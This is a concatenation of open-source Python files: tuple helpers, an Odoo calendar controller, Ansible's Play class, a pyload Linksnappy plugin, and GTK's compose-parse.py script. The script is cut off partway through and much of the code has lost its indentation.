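# Illustrative, with a Django-style choices tuple:
#   get_keys((('small', 'Small'), ('large', 'Large'))) -> ('small', 'large')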
def value_for_key(tuple_of_tuples, key):
"""Processes a tuple of 2-element tuples and returns the value
    corresponding to the given key. If no value is found, the key is returned.
"""
for t in tuple_of_tuples:
if t[0] == key:
return t[1]
else:
return key
def next_key(tuple_of_tuples, key):
"""Processes a tuple of 2-element tuples and returns the key which comes
after the given key.
"""
for i, t in enumerate(tuple_of_tuples):
if t[0] == key:
try:
return tuple_of_tuples[i + 1][0]
except IndexError:
return None
def previous_key(tuple_of_tuples, key):
"""Processes a tuple of 2-element tuples and returns the key which comes
before the given key.
"""
for i, t in enumerate(tuple_of_tuples):
if t[0] == key:
            if i == 0:
                # a negative index would silently wrap to the last element
                return None
            return tuple_of_tuples[i - 1][0]
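# Quick sketch of the three helpers above, with a hypothetical choices tuple:
#   CHOICES = (('s', 'Small'), ('m', 'Medium'), ('l', 'Large'))
#   value_for_key(CHOICES, 'm') -> 'Medium'
#   next_key(CHOICES, 'l')      -> None
#   previous_key(CHOICES, 's')  -> None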
def format_value(value):
"""Returns the given value rounded to one decimal place if it is a
decimal, or integer if it is an integer.
"""
value = decimal.Decimal(str(value))
if int(value) == value:
return int(value)
return round(value, 1)
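# Illustrative:
#   format_value(2.0)  -> 2
#   format_value(2.34) -> 2.3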
| apache-2.0 |
chacoroot/planetary | addons/calendar/controllers/main.py | 329 | 3390 | import simplejson
import openerp
import openerp.http as http
from openerp.http import request
import openerp.addons.web.controllers.main as webmain
import json
class meeting_invitation(http.Controller):
@http.route('/calendar/meeting/accept', type='http', auth="calendar")
def accept(self, db, token, action, id, **kwargs):
registry = openerp.modules.registry.RegistryManager.get(db)
attendee_pool = registry.get('calendar.attendee')
with registry.cursor() as cr:
attendee_id = attendee_pool.search(cr, openerp.SUPERUSER_ID, [('access_token', '=', token), ('state', '!=', 'accepted')])
if attendee_id:
attendee_pool.do_accept(cr, openerp.SUPERUSER_ID, attendee_id)
return self.view(db, token, action, id, view='form')
@http.route('/calendar/meeting/decline', type='http', auth="calendar")
def declined(self, db, token, action, id):
registry = openerp.modules.registry.RegistryManager.get(db)
attendee_pool = registry.get('calendar.attendee')
with registry.cursor() as cr:
attendee_id = attendee_pool.search(cr, openerp.SUPERUSER_ID, [('access_token', '=', token), ('state', '!=', 'declined')])
if attendee_id:
attendee_pool.do_decline(cr, openerp.SUPERUSER_ID, attendee_id)
return self.view(db, token, action, id, view='form')
@http.route('/calendar/meeting/view', type='http', auth="calendar")
def view(self, db, token, action, id, view='calendar'):
registry = openerp.modules.registry.RegistryManager.get(db)
meeting_pool = registry.get('calendar.event')
attendee_pool = registry.get('calendar.attendee')
partner_pool = registry.get('res.partner')
with registry.cursor() as cr:
attendee = attendee_pool.search_read(cr, openerp.SUPERUSER_ID, [('access_token', '=', token)], [])
if attendee and attendee[0] and attendee[0].get('partner_id'):
partner_id = int(attendee[0].get('partner_id')[0])
tz = partner_pool.read(cr, openerp.SUPERUSER_ID, partner_id, ['tz'])['tz']
else:
tz = False
attendee_data = meeting_pool.get_attendee(cr, openerp.SUPERUSER_ID, id, dict(tz=tz))
if attendee:
attendee_data['current_attendee'] = attendee[0]
values = dict(init="s.calendar.event('%s', '%s', '%s', '%s' , '%s');" % (db, action, id, 'form', json.dumps(attendee_data)))
return request.render('web.webclient_bootstrap', values)
    # Called over JSON-RPC every 5 minutes to check whether any event
    # notification is due
@http.route('/calendar/notify', type='json', auth="none")
def notify(self):
registry = request.registry
uid = request.session.uid
context = request.session.context
with registry.cursor() as cr:
res = registry.get("calendar.alarm_manager").get_next_notif(cr, uid, context=context)
return res
@http.route('/calendar/notify_ack', type='json', auth="none")
def notify_ack(self, type=''):
registry = request.registry
uid = request.session.uid
context = request.session.context
with registry.cursor() as cr:
res = registry.get("res.partner")._set_calendar_last_notif_ack(cr, uid, context=context)
return res
| agpl-3.0 |
evaschalde/odoo | addons/l10n_br/__init__.py | 430 | 1403 | # -*- encoding: utf-8 -*-
###############################################################################
# #
# Copyright (C) 2009 Renato Lima - Akretion #
# #
#This program is free software: you can redistribute it and/or modify #
#it under the terms of the GNU Affero General Public License as published by #
#the Free Software Foundation, either version 3 of the License, or #
#(at your option) any later version. #
# #
#This program is distributed in the hope that it will be useful, #
#but WITHOUT ANY WARRANTY; without even the implied warranty of #
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
#GNU General Public License for more details. #
# #
#You should have received a copy of the GNU General Public License #
#along with this program. If not, see <http://www.gnu.org/licenses/>. #
###############################################################################
import account
| agpl-3.0 |
wfxiang08/ansible | lib/ansible/playbook/play.py | 10 | 11982 | # (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from six import string_types
from ansible.errors import AnsibleError, AnsibleParserError
from ansible.playbook.attribute import Attribute, FieldAttribute
from ansible.playbook.base import Base
from ansible.playbook.become import Become
from ansible.playbook.block import Block
from ansible.playbook.helpers import load_list_of_blocks, load_list_of_roles
from ansible.playbook.role import Role
from ansible.playbook.taggable import Taggable
from ansible.playbook.task import Task
from ansible.utils.vars import combine_vars
__all__ = ['Play']
class Play(Base, Taggable, Become):
"""
A play is a language feature that represents a list of roles and/or
task/handler blocks to execute on a given set of hosts.
Usage:
Play.load(datastructure) -> Play
Play.something(...)
"""
# =================================================================================
# Connection-Related Attributes
# TODO: generalize connection
_accelerate = FieldAttribute(isa='bool', default=False)
_accelerate_ipv6 = FieldAttribute(isa='bool', default=False)
_accelerate_port = FieldAttribute(isa='int', default=5099) # should be alias of port
# Connection
_gather_facts = FieldAttribute(isa='bool', default=None)
_hosts = FieldAttribute(isa='list', default=[], required=True, listof=string_types)
_name = FieldAttribute(isa='string', default='')
# Variable Attributes
_vars_files = FieldAttribute(isa='list', default=[])
_vars_prompt = FieldAttribute(isa='list', default=[])
_vault_password = FieldAttribute(isa='string')
# Block (Task) Lists Attributes
_handlers = FieldAttribute(isa='list', default=[])
_pre_tasks = FieldAttribute(isa='list', default=[])
_post_tasks = FieldAttribute(isa='list', default=[])
_tasks = FieldAttribute(isa='list', default=[])
# Role Attributes
_roles = FieldAttribute(isa='list', default=[])
# Flag/Setting Attributes
_any_errors_fatal = FieldAttribute(isa='bool', default=False)
_force_handlers = FieldAttribute(isa='bool')
_max_fail_percentage = FieldAttribute(isa='string', default='0')
_serial = FieldAttribute(isa='int', default=0)
_strategy = FieldAttribute(isa='string', default='linear')
# =================================================================================
def __init__(self):
super(Play, self).__init__()
self.ROLE_CACHE = {}
def __repr__(self):
return self.get_name()
def get_name(self):
''' return the name of the Play '''
return self._attributes.get('name')
@staticmethod
def load(data, variable_manager=None, loader=None):
p = Play()
return p.load_data(data, variable_manager=variable_manager, loader=loader)
def preprocess_data(self, ds):
'''
Adjusts play datastructure to cleanup old/legacy items
'''
assert isinstance(ds, dict)
# The use of 'user' in the Play datastructure was deprecated to
# line up with the same change for Tasks, due to the fact that
# 'user' conflicted with the user module.
if 'user' in ds:
# this should never happen, but error out with a helpful message
# to the user if it does...
if 'remote_user' in ds:
raise AnsibleParserError("both 'user' and 'remote_user' are set for %s. The use of 'user' is deprecated, and should be removed" % self.get_name(), obj=ds)
ds['remote_user'] = ds['user']
del ds['user']
if 'vars_prompt' in ds and not isinstance(ds['vars_prompt'], list):
ds['vars_prompt'] = [ ds['vars_prompt'] ]
return super(Play, self).preprocess_data(ds)
def _load_hosts(self, attr, ds):
'''
Loads the hosts from the given datastructure, which might be a list
or a simple string. We also switch integers in this list back to strings,
as the YAML parser will turn things that look like numbers into numbers.
'''
if isinstance(ds, (string_types, int)):
ds = [ ds ]
if not isinstance(ds, list):
raise AnsibleParserError("'hosts' must be specified as a list or a single pattern", obj=ds)
# YAML parsing of things that look like numbers may have
# resulted in integers showing up in the list, so convert
# them back to strings to prevent problems
        for idx, item in enumerate(ds):
if isinstance(item, int):
ds[idx] = "%s" % item
return ds
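    # _load_hosts illustration (values made up): a ds of [80, 'web'] comes
    # back as ['80', 'web'], and a bare 'webservers' becomes ['webservers'].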
def _load_vars(self, attr, ds):
'''
Vars in a play can be specified either as a dictionary directly, or
as a list of dictionaries. If the later, this method will turn the
list into a single dictionary.
'''
try:
if isinstance(ds, dict):
return ds
elif isinstance(ds, list):
all_vars = dict()
for item in ds:
if not isinstance(item, dict):
raise ValueError
all_vars = combine_vars(all_vars, item)
return all_vars
elif ds is None:
return {}
else:
raise ValueError
except ValueError:
raise AnsibleParserError("Vars in a playbook must be specified as a dictionary, or a list of dictionaries", obj=ds)
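    # _load_vars illustration: a ds of [{'a': 1}, {'b': 2}] is folded into
    # {'a': 1, 'b': 2}; on key collisions the later entry wins, per
    # combine_vars().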
def _load_tasks(self, attr, ds):
'''
Loads a list of blocks from a list which may be mixed tasks/blocks.
Bare tasks outside of a block are given an implicit block.
'''
return load_list_of_blocks(ds=ds, play=self, variable_manager=self._variable_manager, loader=self._loader)
def _load_pre_tasks(self, attr, ds):
'''
Loads a list of blocks from a list which may be mixed tasks/blocks.
Bare tasks outside of a block are given an implicit block.
'''
return load_list_of_blocks(ds=ds, play=self, variable_manager=self._variable_manager, loader=self._loader)
def _load_post_tasks(self, attr, ds):
'''
Loads a list of blocks from a list which may be mixed tasks/blocks.
Bare tasks outside of a block are given an implicit block.
'''
return load_list_of_blocks(ds=ds, play=self, variable_manager=self._variable_manager, loader=self._loader)
def _load_handlers(self, attr, ds):
'''
Loads a list of blocks from a list which may be mixed handlers/blocks.
Bare handlers outside of a block are given an implicit block.
'''
return load_list_of_blocks(ds=ds, play=self, use_handlers=True, variable_manager=self._variable_manager, loader=self._loader)
def _load_roles(self, attr, ds):
'''
Loads and returns a list of RoleInclude objects from the datastructure
list of role definitions and creates the Role from those objects
'''
if ds is None:
ds = []
role_includes = load_list_of_roles(ds, variable_manager=self._variable_manager, loader=self._loader)
roles = []
for ri in role_includes:
roles.append(Role.load(ri, play=self))
return roles
def _post_validate_vars(self, attr, value, templar):
'''
Override post validation of vars on the play, as we don't want to
template these too early.
'''
return value
def _post_validate_vars_files(self, attr, value, templar):
'''
Override post validation of vars_files on the play, as we don't want to
template these too early.
'''
return value
# FIXME: post_validation needs to ensure that become/su/sudo have only 1 set
def _compile_roles(self):
'''
Handles the role compilation step, returning a flat list of tasks
with the lowest level dependencies first. For example, if a role R
has a dependency D1, which also has a dependency D2, the tasks from
D2 are merged first, followed by D1, and lastly by the tasks from
the parent role R last. This is done for all roles in the Play.
'''
block_list = []
if len(self.roles) > 0:
for r in self.roles:
block_list.extend(r.compile(play=self))
return block_list
def compile_roles_handlers(self):
'''
Handles the role handler compilation step, returning a flat list of Handlers
This is done for all roles in the Play.
'''
block_list = []
if len(self.roles) > 0:
for r in self.roles:
block_list.extend(r.get_handler_blocks())
return block_list
def compile(self):
'''
Compiles and returns the task list for this play, compiled from the
roles (which are themselves compiled recursively) and/or the list of
tasks specified in the play.
'''
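        # Net ordering: pre_tasks, flush, role tasks, tasks, flush,
        # post_tasks, flush.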
# create a block containing a single flush handlers meta
# task, so we can be sure to run handlers at certain points
# of the playbook execution
flush_block = Block.load(
data={'meta': 'flush_handlers'},
play=self,
variable_manager=self._variable_manager,
loader=self._loader
)
block_list = []
block_list.extend(self.pre_tasks)
block_list.append(flush_block)
block_list.extend(self._compile_roles())
block_list.extend(self.tasks)
block_list.append(flush_block)
block_list.extend(self.post_tasks)
block_list.append(flush_block)
return block_list
def get_vars(self):
return self.vars.copy()
def get_vars_files(self):
return self.vars_files
def get_handlers(self):
return self.handlers[:]
def get_roles(self):
return self.roles[:]
def get_tasks(self):
tasklist = []
for task in self.pre_tasks + self.tasks + self.post_tasks:
if isinstance(task, Block):
tasklist.append(task.block + task.rescue + task.always)
else:
tasklist.append(task)
return tasklist
def serialize(self):
data = super(Play, self).serialize()
roles = []
for role in self.get_roles():
roles.append(role.serialize())
data['roles'] = roles
return data
def deserialize(self, data):
super(Play, self).deserialize(data)
if 'roles' in data:
role_data = data.get('roles', [])
roles = []
for role in role_data:
r = Role()
r.deserialize(role)
roles.append(r)
setattr(self, 'roles', roles)
del data['roles']
def copy(self):
new_me = super(Play, self).copy()
new_me.ROLE_CACHE = self.ROLE_CACHE.copy()
return new_me
| gpl-3.0 |
synweap15/pyload | module/plugins/hoster/LinksnappyCom.py | 12 | 1628 | # -*- coding: utf-8 -*-
import re
import urlparse
from module.common.json_layer import json_loads, json_dumps
from module.plugins.internal.MultiHoster import MultiHoster, create_getInfo
class LinksnappyCom(MultiHoster):
__name__ = "LinksnappyCom"
__type__ = "hoster"
__version__ = "0.11"
__status__ = "testing"
__pattern__ = r'https?://(?:[^/]+\.)?linksnappy\.com'
__config__ = [("use_premium" , "bool", "Use premium account if available" , True),
("revertfailed", "bool", "Revert to standard download if fails", True)]
__description__ = """Linksnappy.com multi-hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("stickell", "[email protected]")]
def handle_premium(self, pyfile):
host = self._get_host(pyfile.url)
json_params = json_dumps({'link' : pyfile.url,
'type' : host,
'username': self.user,
'password': self.account.get_info(self.user)['login']['password']})
r = self.load("http://linksnappy.com/api/linkgen",
post={'genLinks': json_params})
self.log_debug("JSON data: " + r)
j = json_loads(r)['links'][0]
if j['error']:
self.error(_("Error converting the link"))
pyfile.name = j['filename']
self.link = j['generated']
@staticmethod
def _get_host(url):
host = urlparse.urlsplit(url).netloc
return re.search(r'[\w-]+\.\w+$', host).group(0)
getInfo = create_getInfo(LinksnappyCom)
| gpl-3.0 |
GladeRom/android_external_chromium_org | third_party/gtk+/gtk/compose-parse.py | 149 | 34346 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# compose-parse.py, version 1.3
#
# multifunction script that helps manage the compose sequence table in GTK+ (gtk/gtkimcontextsimple.c)
# the script produces statistics and information about the whole process, run with --help for more.
#
# You may need to switch your python installation to utf-8, if you get 'ascii' codec errors.
#
# Complain to Simos Xenitellis ([email protected], http://simos.info/blog) for this craft.
from re import findall, match, split, sub
from string import atoi
from unicodedata import normalize
from urllib import urlretrieve
from os.path import isfile, getsize
from copy import copy
import sys
import getopt
# We grab files off the web, left and right.
URL_COMPOSE = 'http://gitweb.freedesktop.org/?p=xorg/lib/libX11.git;a=blob_plain;f=nls/en_US.UTF-8/Compose.pre'
URL_KEYSYMSTXT = "http://www.cl.cam.ac.uk/~mgk25/ucs/keysyms.txt"
URL_GDKKEYSYMSH = "http://git.gnome.org/browse/gtk%2B/plain/gdk/gdkkeysyms.h"
URL_UNICODEDATATXT = 'http://www.unicode.org/Public/5.2.0/ucd/UnicodeData.txt'
FILENAME_COMPOSE_SUPPLEMENTARY = 'gtk-compose-lookaside.txt'
# We currently support keysyms of size 2; once upstream xorg gets sorted,
# we might produce some tables with size 2 and some with size 4.
SIZEOFINT = 2
# Current max compose sequence length; in case it gets increased.
WIDTHOFCOMPOSETABLE = 5
keysymdatabase = {}
keysymunicodedatabase = {}
unicodedatabase = {}
headerfile_start = """/* GTK - The GIMP Tool Kit
* Copyright (C) 2007, 2008 GNOME Foundation
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the
* Free Software Foundation, Inc., 59 Temple Place - Suite 330,
* Boston, MA 02111-1307, USA.
*/
/*
* File auto-generated from script found at http://bugzilla.gnome.org/show_bug.cgi?id=321896
* using the input files
* Input : http://gitweb.freedesktop.org/?p=xorg/lib/libX11.git;a=blob_plain;f=nls/en_US.UTF-8/Compose.pre
* Input : http://www.cl.cam.ac.uk/~mgk25/ucs/keysyms.txt
* Input : http://www.unicode.org/Public/UNIDATA/UnicodeData.txt
*
* This table is optimised for space and requires special handling to access the content.
* This table is used solely by http://svn.gnome.org/viewcvs/gtk%2B/trunk/gtk/gtkimcontextsimple.c
*
* The resulting file is placed at http://svn.gnome.org/viewcvs/gtk%2B/trunk/gtk/gtkimcontextsimpleseqs.h
* This file is described in bug report http://bugzilla.gnome.org/show_bug.cgi?id=321896
*/
/*
* Modified by the GTK+ Team and others 2007, 2008. See the AUTHORS
* file for a list of people on the GTK+ Team. See the ChangeLog
* files for a list of changes. These files are distributed with
* GTK+ at ftp://ftp.gtk.org/pub/gtk/.
*/
#ifndef __GTK_IM_CONTEXT_SIMPLE_SEQS_H__
#define __GTK_IM_CONTEXT_SIMPLE_SEQS_H__
/* === These are the original comments of the file; we keep for historical purposes ===
*
* The following table was generated from the X compose tables include with
* XFree86 4.0 using a set of Perl scripts. Contact Owen Taylor <[email protected]>
* to obtain the relevant perl scripts.
*
* The following compose letter letter sequences confliced
* Dstroke/dstroke and ETH/eth; resolved to Dstroke (Croation, Vietnamese, Lappish), over
* ETH (Icelandic, Faroese, old English, IPA) [ D- -D d- -d ]
* Amacron/amacron and ordfeminine; resolved to ordfeminine [ _A A_ a_ _a ]
* Amacron/amacron and Atilde/atilde; resolved to atilde [ -A A- a- -a ]
* Omacron/Omacron and masculine; resolved to masculine [ _O O_ o_ _o ]
* Omacron/omacron and Otilde/atilde; resolved to otilde [ -O O- o- -o ]
*
* [ Amacron and Omacron are in Latin-4 (Baltic). ordfeminine and masculine are used for
* spanish. atilde and otilde are used at least for Portuguese ]
*
* at and Aring; resolved to Aring [ AA ]
* guillemotleft and caron; resolved to guillemotleft [ << ]
* ogonek and cedilla; resolved to cedilla [ ,, ]
*
* This probably should be resolved by first checking an additional set of compose tables
* that depend on the locale or selected input method.
*/
static const guint16 gtk_compose_seqs_compact[] = {"""
headerfile_end = """};
#endif /* __GTK_IM_CONTEXT_SIMPLE_SEQS_H__ */
"""
def stringtohex(s): return atoi(s, 16)
def factorial(n):
if n <= 1:
return 1
else:
return n * factorial(n-1)
def uniq(*args) :
""" Performs a uniq operation on a list or lists """
theInputList = []
for theList in args:
theInputList += theList
theFinalList = []
for elem in theInputList:
if elem not in theFinalList:
theFinalList.append(elem)
return theFinalList
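# Illustrative: uniq([1, 2], [2, 3]) -> [1, 2, 3] (first occurrence wins).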
def all_permutations(seq):
""" Borrowed from http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/252178 """
""" Produces all permutations of the items of a list """
if len(seq) <=1:
yield seq
else:
for perm in all_permutations(seq[1:]):
for i in range(len(perm)+1):
#nb str[0:1] works in both string and list contexts
yield perm[:i] + seq[0:1] + perm[i:]
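# Illustrative: list(all_permutations([1, 2])) -> [[1, 2], [2, 1]]; a sequence
# of n distinct items yields factorial(n) permutations.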
def usage():
print """compose-parse available parameters:
-h, --help this craft
-s, --statistics show overall statistics (both algorithmic, non-algorithmic)
-a, --algorithmic show sequences saved with algorithmic optimisation
-g, --gtk show entries that go to GTK+
-u, --unicodedatatxt show compose sequences derived from UnicodeData.txt (from unicode.org)
-v, --verbose show verbose output
-p, --plane1 show plane1 compose sequences
-n, --numeric when used with --gtk, create file with numeric values only
-e, --gtk-expanded when used with --gtk, create file that repeats first column; not usable in GTK+
--all-sequences when used with --gtk, create file with entries rejected by default
Default is to show statistics.
"""
try:
opts, args = getopt.getopt(sys.argv[1:], "pvgashune", ["help", "algorithmic", "statistics", "unicodedatatxt",
"stats", "gtk", "verbose", "plane1", "numeric", "gtk-expanded", "all-sequences"])
except getopt.GetoptError:
usage()
sys.exit(2)
opt_statistics = False
opt_algorithmic = False
opt_gtk = False
opt_unicodedatatxt = False
opt_verbose = False
opt_plane1 = False
opt_numeric = False
opt_gtkexpanded = False
opt_allsequences = False
for o, a in opts:
if o in ("-h", "--help"):
usage()
sys.exit()
if o in ("-s", "--statistics"):
opt_statistics = True
if o in ("-a", "--algorithmic"):
opt_algorithmic = True
if o in ("-g", "--gtk"):
opt_gtk = True
if o in ("-u", "--unicodedatatxt"):
opt_unicodedatatxt = True
if o in ("-v", "--verbose"):
opt_verbose = True
if o in ("-p", "--plane1"):
opt_plane1 = True
if o in ("-n", "--numeric"):
opt_numeric = True
if o in ("-e", "--gtk-expanded"):
opt_gtkexpanded = True
if o == "--all-sequences":
opt_allsequences = True
if not opt_algorithmic and not opt_gtk and not opt_unicodedatatxt:
opt_statistics = True
def download_hook(blocks_transferred, block_size, file_size):
""" A download hook to provide some feedback when downloading """
if blocks_transferred == 0:
if file_size > 0:
if opt_verbose:
print "Downloading", file_size, "bytes: ",
else:
if opt_verbose:
print "Downloading: ",
sys.stdout.write('#')
sys.stdout.flush()
def download_file(url):
""" Downloads a file provided a URL. Returns the filename. """
""" Borks on failure """
localfilename = url.split('/')[-1]
if not isfile(localfilename) or getsize(localfilename) <= 0:
if opt_verbose:
print "Downloading ", url, "..."
try:
urlretrieve(url, localfilename, download_hook)
except IOError, (errno, strerror):
print "I/O error(%s): %s" % (errno, strerror)
sys.exit(-1)
except:
print "Unexpected error: ", sys.exc_info()[0]
sys.exit(-1)
print " done."
else:
if opt_verbose:
print "Using cached file for ", url
return localfilename
def process_gdkkeysymsh():
""" Opens the gdkkeysyms.h file from GTK+/gdk/gdkkeysyms.h """
""" Fills up keysymdb with contents """
filename_gdkkeysymsh = download_file(URL_GDKKEYSYMSH)
try:
gdkkeysymsh = open(filename_gdkkeysymsh, 'r')
except IOError, (errno, strerror):
print "I/O error(%s): %s" % (errno, strerror)
sys.exit(-1)
except:
print "Unexpected error: ", sys.exc_info()[0]
sys.exit(-1)
""" Parse the gdkkeysyms.h file and place contents in keysymdb """
linenum_gdkkeysymsh = 0
keysymdb = {}
for line in gdkkeysymsh.readlines():
linenum_gdkkeysymsh += 1
line = line.strip()
if line == "" or not match('^#define GDK_KEY_', line):
continue
components = split('\s+', line)
if len(components) < 3:
print "Invalid line %(linenum)d in %(filename)s: %(line)s"\
% {'linenum': linenum_gdkkeysymsh, 'filename': filename_gdkkeysymsh, 'line': line}
print "Was expecting 3 items in the line"
sys.exit(-1)
if not match('^GDK_KEY_', components[1]):
print "Invalid line %(linenum)d in %(filename)s: %(line)s"\
% {'linenum': linenum_gdkkeysymsh, 'filename': filename_gdkkeysymsh, 'line': line}
print "Was expecting a keysym starting with GDK_KEY_"
sys.exit(-1)
if match('^0x[0-9a-fA-F]+$', components[2]):
unival = long(components[2][2:], 16)
if unival == 0:
continue
keysymdb[components[1][8:]] = unival
else:
print "Invalid line %(linenum)d in %(filename)s: %(line)s"\
% {'linenum': linenum_gdkkeysymsh, 'filename': filename_gdkkeysymsh, 'line': line}
print "Was expecting a hexadecimal number at the end of the line"
sys.exit(-1)
gdkkeysymsh.close()
""" Patch up the keysymdb with some of our own stuff """
""" This is for a missing keysym from the currently upstream file """
#keysymdb['dead_stroke'] = 0x338
""" This is for a missing keysym from the currently upstream file """
###keysymdb['dead_belowring'] = 0x323
###keysymdb['dead_belowmacron'] = 0x331
###keysymdb['dead_belowcircumflex'] = 0x32d
###keysymdb['dead_belowtilde'] = 0x330
###keysymdb['dead_belowbreve'] = 0x32e
###keysymdb['dead_belowdiaeresis'] = 0x324
""" This is^Wwas preferential treatment for Greek """
# keysymdb['dead_tilde'] = 0x342
""" This is^was preferential treatment for Greek """
#keysymdb['combining_tilde'] = 0x342
""" Fixing VoidSymbol """
keysymdb['VoidSymbol'] = 0xFFFF
return keysymdb
def process_keysymstxt():
""" Grabs and opens the keysyms.txt file that Markus Kuhn maintains """
""" This file keeps a record between keysyms <-> unicode chars """
filename_keysymstxt = download_file(URL_KEYSYMSTXT)
try:
keysymstxt = open(filename_keysymstxt, 'r')
except IOError, (errno, strerror):
print "I/O error(%s): %s" % (errno, strerror)
sys.exit(-1)
except:
print "Unexpected error: ", sys.exc_info()[0]
sys.exit(-1)
""" Parse the keysyms.txt file and place content in keysymdb """
linenum_keysymstxt = 0
keysymdb = {}
for line in keysymstxt.readlines():
linenum_keysymstxt += 1
line = line.strip()
if line == "" or match('^#', line):
continue
components = split('\s+', line)
if len(components) < 5:
print "Invalid line %(linenum)d in %(filename)s: %(line)s'"\
% {'linenum': linenum_keysymstxt, 'filename': filename_keysymstxt, 'line': line}
print "Was expecting 5 items in the line"
sys.exit(-1)
if match('^U[0-9a-fA-F]+$', components[1]):
unival = long(components[1][1:], 16)
if unival == 0:
continue
keysymdb[components[4]] = unival
keysymstxt.close()
""" Patch up the keysymdb with some of our own stuff """
""" This is for a missing keysym from the currently upstream file """
###keysymdb['dead_belowring'] = 0x323
###keysymdb['dead_belowmacron'] = 0x331
###keysymdb['dead_belowcircumflex'] = 0x32d
###keysymdb['dead_belowtilde'] = 0x330
###keysymdb['dead_belowbreve'] = 0x32e
###keysymdb['dead_belowdiaeresis'] = 0x324
""" This is preferential treatment for Greek """
""" => we get more savings if used for Greek """
# keysymdb['dead_tilde'] = 0x342
""" This is preferential treatment for Greek """
# keysymdb['combining_tilde'] = 0x342
""" This is for a missing keysym from Markus Kuhn's db """
keysymdb['dead_stroke'] = 0x338
""" This is for a missing keysym from Markus Kuhn's db """
keysymdb['Oslash'] = 0x0d8
""" This is for a missing keysym from Markus Kuhn's db """
keysymdb['Ssharp'] = 0x1e9e
""" This is for a missing (recently added) keysym """
keysymdb['dead_psili'] = 0x313
""" This is for a missing (recently added) keysym """
keysymdb['dead_dasia'] = 0x314
""" Allows to import Multi_key sequences """
keysymdb['Multi_key'] = 0xff20
keysymdb['zerosubscript'] = 0x2080
keysymdb['onesubscript'] = 0x2081
keysymdb['twosubscript'] = 0x2082
keysymdb['threesubscript'] = 0x2083
keysymdb['foursubscript'] = 0x2084
keysymdb['fivesubscript'] = 0x2085
keysymdb['sixsubscript'] = 0x2086
keysymdb['sevensubscript'] = 0x2087
keysymdb['eightsubscript'] = 0x2088
keysymdb['ninesubscript'] = 0x2089
keysymdb['dead_doublegrave'] = 0x030F
keysymdb['dead_invertedbreve'] = 0x0311
return keysymdb
def keysymvalue(keysym, file = "n/a", linenum = 0):
""" Extracts a value from the keysym """
""" Find the value of keysym, using the data from keysyms """
""" Use file and linenum to when reporting errors """
if keysym == "":
return 0
if keysymdatabase.has_key(keysym):
return keysymdatabase[keysym]
elif keysym[0] == 'U' and match('[0-9a-fA-F]+$', keysym[1:]):
return atoi(keysym[1:], 16)
elif keysym[:2] == '0x' and match('[0-9a-fA-F]+$', keysym[2:]):
return atoi(keysym[2:], 16)
else:
print 'keysymvalue: UNKNOWN{%(keysym)s}' % { "keysym": keysym }
#return -1
sys.exit(-1)
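# For reference (example values only), the three lookup paths above yield:
#   keysymvalue('VoidSymbol') => 0xFFFF  (from the keysym database)
#   keysymvalue('U0041')      => 0x41    (U-notation hexadecimal)
#   keysymvalue('0x20ac')     => 0x20AC  (plain hexadecimal notation)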
def keysymunicodevalue(keysym, file = "n/a", linenum = 0):
""" Extracts a value from the keysym """
""" Find the value of keysym, using the data from keysyms """
""" Use file and linenum to when reporting errors """
if keysym == "":
return 0
if keysymunicodedatabase.has_key(keysym):
return keysymunicodedatabase[keysym]
elif keysym[0] == 'U' and match('[0-9a-fA-F]+$', keysym[1:]):
return atoi(keysym[1:], 16)
elif keysym[:2] == '0x' and match('[0-9a-fA-F]+$', keysym[2:]):
return atoi(keysym[2:], 16)
else:
print 'keysymunicodevalue: UNKNOWN{%(keysym)s}' % { "keysym": keysym }
sys.exit(-1)
def rename_combining(seq):
filtered_sequence = []
for ks in seq:
if findall('^combining_', ks):
ks = sub('^combining_', 'dead_', ks)
if ks == 'dead_double_grave':
ks = 'dead_doublegrave'
if ks == 'dead_inverted_breve':
ks = 'dead_invertedbreve'
filtered_sequence.append(ks)
return filtered_sequence
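# Quick illustration (example values only): combining_* keysyms are renamed
# to their dead_* equivalents, with two spelling fixups along the way:
#   rename_combining(['combining_tilde', 'a'])   => ['dead_tilde', 'a']
#   rename_combining(['combining_double_grave']) => ['dead_doublegrave']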
keysymunicodedatabase = process_keysymstxt()
keysymdatabase = process_gdkkeysymsh()
""" Grab and open the compose file from upstream """
filename_compose = download_file(URL_COMPOSE)
try:
composefile = open(filename_compose, 'r')
except IOError, (errno, strerror):
print "I/O error(%s): %s" % (errno, strerror)
sys.exit(-1)
except:
print "Unexpected error: ", sys.exc_info()[0]
sys.exit(-1)
""" Look if there is a lookaside (supplementary) compose file in the current
directory, and if so, open, then merge with upstream Compose file.
"""
xorg_compose_sequences_raw = []
for seq in composefile.readlines():
xorg_compose_sequences_raw.append(seq)
try:
composefile_lookaside = open(FILENAME_COMPOSE_SUPPLEMENTARY, 'r')
for seq in composefile_lookaside.readlines():
xorg_compose_sequences_raw.append(seq)
except IOError, (errno, strerror):
if opt_verbose:
print "I/O error(%s): %s" % (errno, strerror)
print "Did not find lookaside compose file. Continuing..."
except:
print "Unexpected error: ", sys.exc_info()[0]
sys.exit(-1)
""" Parse the compose file in xorg_compose_sequences"""
xorg_compose_sequences = []
xorg_compose_sequences_algorithmic = []
linenum_compose = 0
comment_nest_depth = 0
for line in xorg_compose_sequences_raw:
linenum_compose += 1
line = line.strip()
if match("^XCOMM", line) or match("^#", line):
continue
line = sub(r"\/\*([^\*]*|[\*][^/])\*\/", "", line)
comment_start = line.find("/*")
if comment_start >= 0:
if comment_nest_depth == 0:
